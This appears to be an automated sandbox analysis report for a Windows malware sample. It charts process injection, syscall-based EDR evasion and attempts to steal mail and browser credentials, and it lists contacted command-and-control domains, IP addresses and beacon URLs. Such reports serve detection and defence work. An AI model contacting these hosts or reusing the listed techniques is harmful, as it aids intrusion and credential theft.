windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435891 Sample: file.exe Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 30 www.quantumboulevard.xyz 2->30 32 www.klingerlumberltd.com 2->32 34 3 other IPs or domains 2->34 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 52 7 other signatures 2->52 10 file.exe 2 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 signatures5 64 Injects a PE file into a foreign processes 10->64 13 file.exe 10->13         started        16 file.exe 10->16         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 18 LHmmkoXQgKLVlTwFJILFF.exe 13->18 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 18->42 21 unlodctr.exe 13 18->21         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 2 other signatures 21->60 24 LHmmkoXQgKLVlTwFJILFF.exe 21->24 injected 28 firefox.exe 21->28         started        process12 dnsIp13 36 www.gattosat.icu 109.123.121.243, 49729, 49730, 49732 UK2NET-ASGB United Kingdom 24->36 38 www.quantumboulevard.xyz 66.29.135.159, 49738, 49739, 49740 ADVANTAGECOMUS United States 24->38 40 2 other IPs or domains 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
64.225.91.73
 www.linbreoffice.org United States
14061 DIGITALOCEAN-ASNUS false
66.29.135.159
 www.quantumboulevard.xyz United States
19538 ADVANTAGECOMUS true
109.70.148.57
 klingerlumberltd.com United Kingdom
25369 BANDWIDTH-ASGB false
109.123.121.243
 www.gattosat.icu United Kingdom
13213 UK2NET-ASGB true

Contacted Domains

Name IP Active
www.linbreoffice.org 64.225.91.73 true
www.quantumboulevard.xyz 66.29.135.159 true
klingerlumberltd.com 109.70.148.57 true
www.gattosat.icu 109.123.121.243 true
www.klingerlumberltd.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.linbreoffice.org/qruc/?K0J=ebDTRVV8VZr&oB1d=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQRfJBsE/jQutHm2oMvc1KqjOm02x0DQ= false
  • Avira URL Cloud: malware
 unknown
http://www.klingerlumberltd.com/qruc/?K0J=ebDTRVV8VZr&oB1d=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2hcokdL8Q9MgXuVmgdyCbuMpnnH80A0= false
  • Avira URL Cloud: malware
 unknown
http://www.linbreoffice.org/qruc/ false
  • Avira URL Cloud: malware
 unknown
http://www.gattosat.icu/qruc/ true
  • Avira URL Cloud: safe
 unknown
http://www.gattosat.icu/qruc/?oB1d=UAq9CzGRql0qbxLGxVHqg5bf0CZ8rOmIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRMVrUBL+8Gy/k2I5T6z62CfhcpnnIk8mA5gg=&K0J=ebDTRVV8VZr true
  • Avira URL Cloud: safe
 unknown
http://www.quantumboulevard.xyz/qruc/?oB1d=TKQjCngekOUXb4wXltIPy/Q8yQpui0ExkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DtV2YStFMFWvJ0j7VceHyQH2xgQtUsq8+akA=&K0J=ebDTRVV8VZr false
  • Avira URL Cloud: safe
 unknown
http://www.quantumboulevard.xyz/qruc/ false
  • Avira URL Cloud: safe
 unknown